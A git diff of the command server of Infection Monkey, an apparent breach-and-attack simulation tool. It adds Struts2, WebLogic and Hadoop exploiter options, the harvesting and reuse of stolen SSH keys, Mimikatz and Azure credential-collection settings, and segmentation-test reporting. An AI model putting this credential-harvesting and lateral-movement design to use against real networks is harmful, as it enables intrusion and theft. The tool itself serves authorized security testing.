        'filename': 'monkey-linux-64',
@ -32,6 +40,16 @@ MONKEY_DOWNLOADS = [
        'machine': 'amd64',
        'filename': 'monkey-windows-64.exe',
    },
{
'type': 'windows',
'machine': '64',
'filename': 'monkey-windows-64.exe',
},
{
'type': 'windows',
'machine': '32',
'filename': 'monkey-windows-32.exe',
},
    {
        'type': 'windows',
        'filename': 'monkey-windows-32.exe',
@ -42,7 +60,10 @@ MONKEY_DOWNLOADS = [
def get_monkey_executable(host_os, machine):
    for download in MONKEY_DOWNLOADS:
        if host_os == download.get('type') and machine == download.get('machine'):
            logger.info('Monkey exec found for os: {0} and machine: {1}'.format(host_os, machine))
            return download
logger.warning('No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}'
.format(host_os, machine))
    return None

View File

@ -1,4 +1,5 @@
from datetime import datetime
import logging
import flask_restful
from flask import request, make_response, jsonify
@ -12,6 +13,8 @@ from cc.utils import local_ip_addresses
__author__ = 'Barak'
logger = logging.getLogger(__name__)
class Root(flask_restful.Resource):
@ -42,6 +45,7 @@ class Root(flask_restful.Resource):
        # We can't drop system collections.
        [mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')]
        ConfigService.init_config()
        logger.info('DB was reset')
        return jsonify(status='OK')
    @staticmethod
@ -50,6 +54,7 @@ class Root(flask_restful.Resource):
        mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}},
                               upsert=False,
                               multi=True)
        logger.info('Kill all monkeys was called')
        return jsonify(status='OK')
    @staticmethod
@ -57,5 +62,8 @@ class Root(flask_restful.Resource):
    def get_completed_steps():
        is_any_exists = NodeService.is_any_monkey_exists()
        infection_done = NodeService.is_monkey_finished_running()
-        report_done = ReportService.is_report_generated()
+        if not infection_done:
+            report_done = False
+        else:
+            report_done = ReportService.is_report_generated()
        return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)

View File

@ -1,4 +1,5 @@
import json
import logging
import traceback
import copy
from datetime import datetime
@ -17,6 +18,9 @@ from cc.encryptor import encryptor
__author__ = 'Barak'
logger = logging.getLogger(__name__)
class Telemetry(flask_restful.Resource):
    @jwt_required()
    def get(self, **kw):
@ -52,10 +56,9 @@ class Telemetry(flask_restful.Resource):
            if telem_type in TELEM_PROCESS_DICT:
                TELEM_PROCESS_DICT[telem_type](telemetry_json)
            else:
-                print('Got unknown type of telemetry: %s' % telem_type)
-        except StandardError as ex:
-            print("Exception caught while processing telemetry: %s" % str(ex))
-            traceback.print_exc()
+                logger.info('Got unknown type of telemetry: %s' % telem_type)
+        except Exception as ex:
+            logger.error("Exception caught while processing telemetry", exc_info=True)
        telem_id = mongo.db.telemetry.insert(telemetry_json)
        return mongo.db.telemetry.find_one_or_404({"_id": telem_id})
@ -130,7 +133,7 @@ class Telemetry(flask_restful.Resource):
            for attempt in telemetry_json['data']['attempts']:
                if attempt['result']:
                    found_creds = {'user': attempt['user']}
-                    for field in ['password', 'lm_hash', 'ntlm_hash']:
+                    for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
                        if len(attempt[field]) != 0:
                            found_creds[field] = attempt[field]
                    NodeService.add_credentials_to_node(edge['to'], found_creds)
@ -167,12 +170,24 @@ class Telemetry(flask_restful.Resource):
    @staticmethod
    def process_system_info_telemetry(telemetry_json):
if 'ssh_info' in telemetry_json['data']:
ssh_info = telemetry_json['data']['ssh_info']
Telemetry.encrypt_system_info_ssh_keys(ssh_info)
if telemetry_json['data']['network_info']['networks']:
                # We use user_name@machine_ip as the name of the stolen ssh key, that's why we need the IP from telemetry
Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
Telemetry.add_system_info_ssh_keys_to_config(ssh_info)
        if 'credentials' in telemetry_json['data']:
            creds = telemetry_json['data']['credentials']
            Telemetry.encrypt_system_info_creds(creds)
            Telemetry.add_system_info_creds_to_config(creds)
            Telemetry.replace_user_dot_with_comma(creds)
@staticmethod
def add_ip_to_ssh_keys(ip, ssh_info):
for key in ssh_info:
key['ip'] = ip['addr']
    @staticmethod
    def process_trace_telemetry(telemetry_json):
        # Nothing to do
@ -193,6 +208,13 @@ class Telemetry(flask_restful.Resource):
                # this encoding is because we might run into passwords which are not pure ASCII
                creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
@staticmethod
def encrypt_system_info_ssh_keys(ssh_info):
for idx, user in enumerate(ssh_info):
for field in ['public_key', 'private_key', 'known_hosts']:
if ssh_info[idx][field]:
ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
    @staticmethod
    def add_system_info_creds_to_config(creds):
        for user in creds:
@ -204,6 +226,15 @@ class Telemetry(flask_restful.Resource):
            if 'ntlm_hash' in creds[user]:
                ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
@staticmethod
def add_system_info_ssh_keys_to_config(ssh_info):
for user in ssh_info:
ConfigService.creds_add_username(user['name'])
# Public key is useless without private key
if user['public_key'] and user['private_key']:
ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
user['name'], user['ip'])
    @staticmethod
    def encrypt_exploit_creds(telemetry_json):
        attempts = telemetry_json['data']['attempts']

View File

@ -1,7 +1,9 @@
import copy
import collections
import functools
import logging
from jsonschema import Draft4Validator, validators
from six import string_types
from cc.database import mongo
from cc.encryptor import encryptor
@ -10,6 +12,8 @@ from cc.utils import local_ip_addresses
__author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
WARNING_SIGN = u" \u26A0"
SCHEMA = {
@ -76,6 +80,27 @@ SCHEMA = {
                    ],
                    "title": "ElasticGroovy Exploiter"
                },
{
"type": "string",
"enum": [
"Struts2Exploiter"
],
"title": "Struts2 Exploiter"
},
{
"type": "string",
"enum": [
"WebLogicExploiter"
],
"title": "Oracle Web Logic Exploiter"
},
{
"type": "string",
"enum": [
"HadoopExploiter"
],
"title": "Hadoop/Yarn Exploiter"
}
                ]
            },
            "finger_classes": {
@ -117,6 +142,14 @@ SCHEMA = {
                    ],
                    "title": "MySQLFinger"
                },
{
"type": "string",
"enum": [
"MSSQLFinger"
],
"title": "MSSQLFinger"
},
                {
                    "type": "string",
                    "enum": [
@ -217,6 +250,31 @@ SCHEMA = {
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\"" " Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
} }
} }
},
"network_analysis": {
"title": "Network Analysis",
"type": "object",
"properties": {
"inaccessible_subnets": {
"title": "Network segmentation testing",
"type": "array",
"uniqueItems": True,
"items": {
"type": "string"
},
"default": [
],
"description":
"Test for network segmentation by providing a list of"
" subnets that should NOT be accessible to each other."
" For example, given the following configuration:"
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
" a Monkey running on 10.0.0.5 will try to access machines in the following"
" subnets: 11.0.0.2/32, 12.2.3.0/24."
" An alert on successful connections will be shown in the report"
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
}
}
                }
            }
        },
@ -260,6 +318,31 @@ SCHEMA = {
                    }
                }
            },
"system_info": {
"title": "System info",
"type": "object",
"properties": {
"extract_azure_creds": {
"title": "Harvest Azure Credentials",
"type": "boolean",
"default": True,
"description":
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
},
"collect_system_info": {
"title": "Collect system info",
"type": "boolean",
"default": True,
"description": "Determines whether to collect system info"
},
"should_use_mimikatz": {
"title": "Should use Mimikatz",
"type": "boolean",
"default": True,
"description": "Determines whether to use Mimikatz"
},
}
},
"life_cycle": { "life_cycle": {
"title": "Life cycle", "title": "Life cycle",
"type": "object", "type": "object",
@ -320,12 +403,6 @@ SCHEMA = {
"description": "description":
"The name of the mutex used to determine whether the monkey is already running" "The name of the mutex used to determine whether the monkey is already running"
}, },
"collect_system_info": {
"title": "Collect system info",
"type": "boolean",
"default": True,
"description": "Determines whether to collect system info"
},
"keep_tunnel_open_time": { "keep_tunnel_open_time": {
"title": "Keep tunnel open time", "title": "Keep tunnel open time",
"type": "integer", "type": "integer",
@ -363,6 +440,7 @@ SCHEMA = {
"PingScanner", "PingScanner",
"HTTPFinger", "HTTPFinger",
"MySQLFinger", "MySQLFinger",
"MSSQLFinger",
"ElasticFinger" "ElasticFinger"
], ],
"description": "Determines which classes to use for fingerprinting" "description": "Determines which classes to use for fingerprinting"
@ -504,26 +582,16 @@ SCHEMA = {
                    },
                    "default": [],
                    "description": "List of NTLM hashes to use on exploits using credentials"
-                }
-            }
-        },
-        "systemInfo": {
-            "title": "System collection",
-            "type": "object",
-            "properties": {
-                "mimikatz_dll_name": {
-                    "title": "Mimikatz DLL name",
-                    "type": "string",
-                    "default": "mk.dll",
-                    "description":
-                        "Name of Mimikatz DLL (should be the same as in the monkey's pyinstaller spec file)"
-                },
-                "extract_azure_creds": {
-                    "title": "Harvest Azure Credentials",
-                    "type": "boolean",
-                    "default": True,
-                    "description":
-                        "Determine if the Monkey should try to harvest password credentials from Azure VMs"
+                },
+                "exploit_ssh_keys": {
+                    "title": "SSH key pairs list",
+                    "type": "array",
+                    "uniqueItems": True,
+                    "default": [],
+                    "items": {
+                        "type": "string"
+                    },
+                    "description": "List of SSH key pairs to use, when trying to ssh into servers"
                }
            }
        }
@ -545,7 +613,7 @@ SCHEMA = {
"type": "string" "type": "string"
}, },
"default": [ "default": [
"41.50.73.31:5000" "192.0.2.0:5000"
], ],
"description": "List of command servers to try and communicate with (format is <ip>:<port>)" "description": "List of command servers to try and communicate with (format is <ip>:<port>)"
}, },
@ -567,7 +635,7 @@ SCHEMA = {
"current_server": { "current_server": {
"title": "Current server", "title": "Current server",
"type": "string", "type": "string",
"default": "41.50.73.31:5000", "default": "192.0.2.0:5000",
"description": "The current command server the monkey is communicating with" "description": "The current command server the monkey is communicating with"
} }
} }
@ -595,7 +663,10 @@ SCHEMA = {
"SSHExploiter", "SSHExploiter",
"ShellShockExploiter", "ShellShockExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"ElasticGroovyExploiter" "ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter"
], ],
"description": "description":
"Determines which exploits to use. " + WARNING_SIGN "Determines which exploits to use. " + WARNING_SIGN
@ -730,7 +801,8 @@ SCHEMA = {
                        80,
                        8080,
                        443,
-                        8008
+                        8008,
+                        7001
                    ],
                    "description": "List of ports the monkey will check if are being used for HTTP"
                },
@ -752,7 +824,8 @@ SCHEMA = {
                        443,
                        8008,
                        3306,
-                        9200
+                        9200,
+                        7001
                    ],
                    "description": "List of TCP ports the monkey will check whether they're open"
                },
@ -800,7 +873,8 @@ ENCRYPTED_CONFIG_ARRAYS = \
    [
        ['basic', 'credentials', 'exploit_password_list'],
        ['internal', 'exploits', 'exploit_lm_hash_list'],
-        ['internal', 'exploits', 'exploit_ntlm_hash_list']
+        ['internal', 'exploits', 'exploit_ntlm_hash_list'],
+        ['internal', 'exploits', 'exploit_ssh_keys']
    ]
@ -888,11 +962,24 @@ class ConfigService:
def creds_add_ntlm_hash(ntlm_hash): def creds_add_ntlm_hash(ntlm_hash):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ntlm_hash_list', ntlm_hash) ConfigService.add_item_to_config_set('internal.exploits.exploit_ntlm_hash_list', ntlm_hash)
@staticmethod
def ssh_add_keys(public_key, private_key, user, ip):
if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'],
False, False), user, ip):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys',
{"public_key": public_key, "private_key": private_key,
"user": user, "ip": ip})
@staticmethod
def ssh_key_exists(keys, user, ip):
return [key for key in keys if key['user'] == user and key['ip'] == ip]
@staticmethod @staticmethod
def update_config(config_json, should_encrypt): def update_config(config_json, should_encrypt):
if should_encrypt: if should_encrypt:
ConfigService.encrypt_config(config_json) ConfigService.encrypt_config(config_json)
mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True)
logger.info('monkey config was updated')
@staticmethod @staticmethod
def init_default_config(): def init_default_config():
@ -908,6 +995,7 @@ class ConfigService:
config = copy.deepcopy(ConfigService.default_config) config = copy.deepcopy(ConfigService.default_config)
if should_encrypt: if should_encrypt:
ConfigService.encrypt_config(config) ConfigService.encrypt_config(config)
logger.info("Default config was called")
return config return config
@staticmethod @staticmethod
@ -921,6 +1009,7 @@ class ConfigService:
config = ConfigService.get_default_config(True) config = ConfigService.get_default_config(True)
ConfigService.set_server_ips_in_config(config) ConfigService.set_server_ips_in_config(config)
ConfigService.update_config(config, should_encrypt=False) ConfigService.update_config(config, should_encrypt=False)
logger.info('Monkey config reset was called')
@staticmethod @staticmethod
def set_server_ips_in_config(config): def set_server_ips_in_config(config):
@ -937,6 +1026,7 @@ class ConfigService:
initial_config['name'] = 'initial' initial_config['name'] = 'initial'
initial_config.pop('_id') initial_config.pop('_id')
mongo.db.config.insert(initial_config) mongo.db.config.insert(initial_config)
logger.info('Monkey config was inserted to mongo and saved')
@staticmethod @staticmethod
def _extend_config_with_default(validator_class): def _extend_config_with_default(validator_class):
@ -978,8 +1068,12 @@ class ConfigService:
""" """
keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS] keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
for key in keys: for key in keys:
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], basestring): if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
flat_config[key] = [encryptor.dec(item) for item in flat_config[key]] # Check if we are decrypting ssh key pair
if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]:
flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]]
else:
flat_config[key] = [encryptor.dec(item) for item in flat_config[key]]
else: else:
flat_config[key] = encryptor.dec(flat_config[key]) flat_config[key] = encryptor.dec(flat_config[key])
return flat_config return flat_config
@ -992,4 +1086,19 @@ class ConfigService:
config_arr = config_arr[config_key_part] config_arr = config_arr[config_key_part]
for i in range(len(config_arr)): for i in range(len(config_arr)):
config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i]) # Check whether this is an array of SSH key pairs, then encrypt/decrypt accordingly
if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]:
config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \
ConfigService.decrypt_ssh_key_pair(config_arr[i], True)
else:
config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i])
@staticmethod
def decrypt_ssh_key_pair(pair, encrypt=False):
if encrypt:
pair['public_key'] = encryptor.enc(pair['public_key'])
pair['private_key'] = encryptor.enc(pair['private_key'])
else:
pair['public_key'] = encryptor.dec(pair['public_key'])
pair['private_key'] = encryptor.dec(pair['private_key'])
return pair
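To make the key-pair handling above concrete, here is a self-contained sketch of the round trip; the real encryptor module is not shown in this diff, so a trivial reversible stand-in is used (an assumption, for illustration only):

import base64

class _FakeEncryptor(object):
    # Stand-in for the island's encryptor; only enc/dec are assumed, nothing else.
    def enc(self, plaintext):
        return base64.b64encode(plaintext.encode()).decode()

    def dec(self, ciphertext):
        return base64.b64decode(ciphertext.encode()).decode()

encryptor = _FakeEncryptor()
# Shape matches what ssh_add_keys stores; the values are made up.
pair = {'public_key': 'ssh-rsa AAAA...', 'private_key': '-----BEGIN RSA PRIVATE KEY-----...',
        'user': 'root', 'ip': '10.0.0.12'}
# Only the key material is transformed; user and ip stay in the clear, as in decrypt_ssh_key_pair.
encrypted = dict(pair, public_key=encryptor.enc(pair['public_key']),
                 private_key=encryptor.enc(pair['private_key']))
decrypted = dict(encrypted, public_key=encryptor.dec(encrypted['public_key']),
                 private_key=encryptor.dec(encrypted['private_key']))
assert decrypted == pair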

View File

@ -0,0 +1,32 @@
import logging
__author__ = "Maor.Rayzin"
logger = logging.getLogger(__name__)
class IslandLogService:
def __init__(self):
pass
@staticmethod
def get_log_file():
"""
This static method is a helper for the Monkey Island log download feature.
It walks the parent logger's handlers and looks for a file-based handler of any kind by checking whether the
handler has a baseFilename attribute.
:return:
A dict with the log file content, or None if no file handler was found.
"""
logger_handlers = logger.parent.handlers
for handler in logger_handlers:
if hasattr(handler, 'baseFilename'):
logger.info('Log file found: {0}'.format(handler.baseFilename))
log_file_path = handler.baseFilename
with open(log_file_path, 'rt') as f:
log_file = f.read()
return {
'log_file': log_file
}
logger.warning('No log file could be found, check logger config.')
return None
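For context, a minimal standalone sketch of the handler walk get_log_file relies on; the log file name and logger name below are assumptions, not taken from the diff:

import logging

logging.basicConfig(filename='island.log', level=logging.INFO)   # assumed file name
logger = logging.getLogger('example_module')

def find_log_file_path():
    # Mirrors the baseFilename check above: any file-backed handler
    # (FileHandler, RotatingFileHandler, ...) exposes a baseFilename attribute.
    for handler in logger.parent.handlers:
        if hasattr(handler, 'baseFilename'):
            return handler.baseFilename
    return None

print(find_log_file_path())   # absolute path of island.log, or None if only stream handlers exist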

View File

@ -1,15 +1,25 @@
import itertools
import functools
import ipaddress import ipaddress
import logging
from enum import Enum from enum import Enum
from six import text_type
from cc.database import mongo from cc.database import mongo
from cc.services.config import ConfigService from cc.services.config import ConfigService
from cc.services.edge import EdgeService from cc.services.edge import EdgeService
from cc.services.node import NodeService from cc.services.node import NodeService
from cc.utils import local_ip_addresses, get_subnets from cc.utils import local_ip_addresses, get_subnets
from common.network.network_range import NetworkRange
__author__ = "itay.mizeretz" __author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
class ReportService: class ReportService:
def __init__(self): def __init__(self):
pass pass
@ -24,6 +34,9 @@ class ReportService:
'ElasticGroovyExploiter': 'Elastic Groovy Exploiter', 'ElasticGroovyExploiter': 'Elastic Groovy Exploiter',
'Ms08_067_Exploiter': 'Conficker Exploiter', 'Ms08_067_Exploiter': 'Conficker Exploiter',
'ShellShockExploiter': 'ShellShock Exploiter', 'ShellShockExploiter': 'ShellShock Exploiter',
'Struts2Exploiter': 'Struts2 Exploiter',
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
'HadoopExploiter': 'Hadoop/Yarn Exploiter'
} }
class ISSUES_DICT(Enum): class ISSUES_DICT(Enum):
@ -34,6 +47,10 @@ class ReportService:
SHELLSHOCK = 4 SHELLSHOCK = 4
CONFICKER = 5 CONFICKER = 5
AZURE = 6 AZURE = 6
STOLEN_SSH_KEYS = 7
STRUTS2 = 8
WEBLOGIC = 9
HADOOP = 10
class WARNINGS_DICT(Enum): class WARNINGS_DICT(Enum):
CROSS_SEGMENT = 0 CROSS_SEGMENT = 0
@ -77,6 +94,8 @@ class ReportService:
creds = ReportService.get_azure_creds() creds = ReportService.get_azure_creds()
machines = set([instance['origin'] for instance in creds]) machines = set([instance['origin'] for instance in creds])
logger.info('Azure issues generated for reporting')
return [ return [
{ {
'type': 'azure_password', 'type': 'azure_password',
@ -103,6 +122,8 @@ class ReportService:
} }
for node in nodes] for node in nodes]
logger.info('Scanned nodes generated for reporting')
return nodes return nodes
@staticmethod @staticmethod
@ -124,6 +145,8 @@ class ReportService:
} }
for monkey in exploited] for monkey in exploited]
logger.info('Exploited nodes generated for reporting')
return exploited return exploited
@staticmethod @staticmethod
@ -147,6 +170,28 @@ class ReportService:
'origin': origin 'origin': origin
} }
) )
logger.info('Stolen creds generated for reporting')
return creds
@staticmethod
def get_ssh_keys():
"""
Return private ssh keys found as credentials
:return: List of credentials
"""
creds = []
for telem in mongo.db.telemetry.find(
{'telem_type': 'system_info_collection', 'data.ssh_info': {'$exists': True}},
{'data.ssh_info': 1, 'monkey_guid': 1}
):
origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname']
if telem['data']['ssh_info']:
# Pick out all ssh keys not yet included in creds
ssh_keys = [{'username': key_pair['name'], 'type': 'Clear SSH private key',
'origin': origin} for key_pair in telem['data']['ssh_info']
if key_pair['private_key'] and {'username': key_pair['name'], 'type': 'Clear SSH private key',
'origin': origin} not in creds]
creds.extend(ssh_keys)
return creds return creds
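For reference, an illustrative telemetry document that the query above would match; every value is made up, and only the fields the code actually reads (plus public_key) are shown:

example_telem = {
    'telem_type': 'system_info_collection',
    'monkey_guid': 'abcd-1234',
    'data': {
        'ssh_info': [
            {'name': 'ubuntu',                               # becomes 'username' in the creds list
             'public_key': 'ssh-rsa AAAA...',
             'private_key': '-----BEGIN RSA PRIVATE KEY-----...'}
        ]
    }
}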
@staticmethod @staticmethod
@ -167,6 +212,8 @@ class ReportService:
azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password', azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password',
'origin': origin} for user in azure_users] 'origin': origin} for user in azure_users]
creds.extend(azure_leaked_users) creds.extend(azure_leaked_users)
logger.info('Azure machines creds generated for reporting')
return creds return creds
@staticmethod @staticmethod
@ -182,9 +229,12 @@ class ReportService:
for attempt in exploit['data']['attempts']: for attempt in exploit['data']['attempts']:
if attempt['result']: if attempt['result']:
processed_exploit['username'] = attempt['user'] processed_exploit['username'] = attempt['user']
if len(attempt['password']) > 0: if attempt['password']:
processed_exploit['type'] = 'password' processed_exploit['type'] = 'password'
processed_exploit['password'] = attempt['password'] processed_exploit['password'] = attempt['password']
elif attempt['ssh_key']:
processed_exploit['type'] = 'ssh_key'
processed_exploit['ssh_key'] = attempt['ssh_key']
else: else:
processed_exploit['type'] = 'hash' processed_exploit['type'] = 'hash'
return processed_exploit return processed_exploit
@ -210,8 +260,12 @@ class ReportService:
@staticmethod @staticmethod
def process_ssh_exploit(exploit): def process_ssh_exploit(exploit):
processed_exploit = ReportService.process_general_creds_exploit(exploit) processed_exploit = ReportService.process_general_creds_exploit(exploit)
processed_exploit['type'] = 'ssh' # Check whether this is an SSH key exploit or an SSH login-credentials exploit
return processed_exploit if processed_exploit['type'] == 'ssh_key':
return processed_exploit
else:
processed_exploit['type'] = 'ssh'
return processed_exploit
@staticmethod @staticmethod
def process_rdp_exploit(exploit): def process_rdp_exploit(exploit):
@ -246,6 +300,24 @@ class ReportService:
processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls] processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls]
return processed_exploit return processed_exploit
@staticmethod
def process_struts2_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'struts2'
return processed_exploit
@staticmethod
def process_weblogic_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'weblogic'
return processed_exploit
@staticmethod
def process_hadoop_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'hadoop'
return processed_exploit
@staticmethod @staticmethod
def process_exploit(exploit): def process_exploit(exploit):
exploiter_type = exploit['data']['exploiter'] exploiter_type = exploit['data']['exploiter']
@ -258,6 +330,9 @@ class ReportService:
'ElasticGroovyExploiter': ReportService.process_elastic_exploit, 'ElasticGroovyExploiter': ReportService.process_elastic_exploit,
'Ms08_067_Exploiter': ReportService.process_conficker_exploit, 'Ms08_067_Exploiter': ReportService.process_conficker_exploit,
'ShellShockExploiter': ReportService.process_shellshock_exploit, 'ShellShockExploiter': ReportService.process_shellshock_exploit,
'Struts2Exploiter': ReportService.process_struts2_exploit,
'WebLogicExploiter': ReportService.process_weblogic_exploit,
'HadoopExploiter': ReportService.process_hadoop_exploit
} }
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit) return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@ -282,12 +357,12 @@ class ReportService:
return \ return \
[ [
ipaddress.ip_interface(unicode(network['addr'] + '/' + network['netmask'])).network ipaddress.ip_interface(text_type(network['addr'] + '/' + network['netmask'])).network
for network in network_info['data']['network_info']['networks'] for network in network_info['data']['network_info']['networks']
] ]
@staticmethod @staticmethod
def get_cross_segment_issues(): def get_island_cross_segment_issues():
issues = [] issues = []
island_ips = local_ip_addresses() island_ips = local_ip_addresses()
for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}): for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}):
@ -295,29 +370,174 @@ class ReportService:
monkey_subnets = ReportService.get_monkey_subnets(monkey['guid']) monkey_subnets = ReportService.get_monkey_subnets(monkey['guid'])
for subnet in monkey_subnets: for subnet in monkey_subnets:
for ip in island_ips: for ip in island_ips:
if ipaddress.ip_address(unicode(ip)) in subnet: if ipaddress.ip_address(text_type(ip)) in subnet:
found_good_ip = True found_good_ip = True
break break
if found_good_ip: if found_good_ip:
break break
if not found_good_ip: if not found_good_ip:
issues.append( issues.append(
{'type': 'cross_segment', 'machine': monkey['hostname'], {'type': 'island_cross_segment', 'machine': monkey['hostname'],
'networks': [str(subnet) for subnet in monkey_subnets], 'networks': [str(subnet) for subnet in monkey_subnets],
'server_networks': [str(subnet) for subnet in get_subnets()]} 'server_networks': [str(subnet) for subnet in get_subnets()]}
) )
return issues return issues
@staticmethod
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
"""
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
:param ip_addresses: List of IP addresses to test.
:param source_subnet: Subnet we want an IP to be in.
:param target_subnet: Subnet we want an IP not to be in.
:return: An IP address from ip_addresses that is in source_subnet, or None if any of the addresses is in target_subnet.
"""
for ip_address in ip_addresses:
if target_subnet.is_in_range(ip_address):
return None
for ip_address in ip_addresses:
if source_subnet.is_in_range(ip_address):
return ip_address
return None
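A hedged usage sketch of the helper above; the subnets and addresses are made up, the addresses are assumed to be text strings as they would come from Mongo, and NetworkRange.get_range_obj is used the same way it is used further down in this file:

source = NetworkRange.get_range_obj('10.0.0.0/24')
target = NetworkRange.get_range_obj('10.0.1.0/24')
ips = ['192.168.1.7', '10.0.0.5']   # one interface outside both subnets, one inside the source subnet
print(ReportService.get_ip_in_src_and_not_in_dst(ips, source, target))   # -> '10.0.0.5'
# If any of the addresses were inside the target subnet, the helper would return None instead.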
@staticmethod
def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
"""
Gets the list of cross-segment issues caused by single machines, i.e. machines that have an interface in each of the
two subnets.
:param source_subnet_range: The subnet range which shouldn't be able to access target_subnet_range.
:param target_subnet_range: The subnet range which shouldn't be accessible from source_subnet_range.
:return: List of issues, one for each machine that has an IP address in both subnet ranges.
"""
cross_segment_issues = []
for monkey in mongo.db.monkey.find({}, {'ip_addresses': 1, 'hostname': 1}):
ip_in_src = None
ip_in_dst = None
for ip_addr in monkey['ip_addresses']:
if source_subnet_range.is_in_range(text_type(ip_addr)):
ip_in_src = ip_addr
break
# No point searching the dst subnet if there are no IPs in src subnet.
if not ip_in_src:
continue
for ip_addr in monkey['ip_addresses']:
if target_subnet_range.is_in_range(text_type(ip_addr)):
ip_in_dst = ip_addr
break
if ip_in_dst:
cross_segment_issues.append(
{
'source': ip_in_src,
'hostname': monkey['hostname'],
'target': ip_in_dst,
'services': None,
'is_self': True
})
return cross_segment_issues
@staticmethod
def get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet):
"""
Gets list of cross segment issues from source_subnet to target_subnet.
:param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
This should be a PyMongo cursor object.
:param source_subnet: The subnet which shouldn't be able to access target_subnet.
:param target_subnet: The subnet which shouldn't be accessible from source_subnet.
:return: List of cross segment issues from source_subnet to target_subnet.
"""
if source_subnet == target_subnet:
return []
source_subnet_range = NetworkRange.get_range_obj(source_subnet)
target_subnet_range = NetworkRange.get_range_obj(target_subnet)
cross_segment_issues = []
scans.rewind()  # If we have already iterated over scans, we need to rewind the cursor.
for scan in scans:
target_ip = scan['data']['machine']['ip_addr']
if target_subnet_range.is_in_range(text_type(target_ip)):
monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
cross_segment_ip = ReportService.get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
source_subnet_range,
target_subnet_range)
if cross_segment_ip is not None:
cross_segment_issues.append(
{
'source': cross_segment_ip,
'hostname': monkey['hostname'],
'target': target_ip,
'services': scan['data']['machine']['services'],
'is_self': False
})
return cross_segment_issues + ReportService.get_cross_segment_issues_of_single_machine(
source_subnet_range, target_subnet_range)
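The scans argument is expected to be a PyMongo cursor over documents shaped roughly like the sketch below (values are made up; only the fields projected in get_cross_segment_issues are shown). Because the same cursor is reused for every subnet pair, it is rewound before each iteration:

example_scan = {
    'monkey_guid': 'abcd-1234',
    'data': {
        'machine': {
            'ip_addr': '10.0.1.12',
            'services': {'tcp-445': 'unknown'}   # the structure of each service entry is an assumption
        }
    }
}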
@staticmethod
def get_cross_segment_issues_per_subnet_group(scans, subnet_group):
"""
Gets list of cross segment issues within given subnet_group.
:param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
This should be a PyMongo cursor object.
:param subnet_group: List of subnets which shouldn't be accessible from each other.
:return: Cross segment issues regarding the subnets in the group.
"""
cross_segment_issues = []
for subnet_pair in itertools.product(subnet_group, subnet_group):
source_subnet = subnet_pair[0]
target_subnet = subnet_pair[1]
pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet)
if len(pair_issues) != 0:
cross_segment_issues.append(
{
'source_subnet': source_subnet,
'target_subnet': target_subnet,
'issues': pair_issues
})
return cross_segment_issues
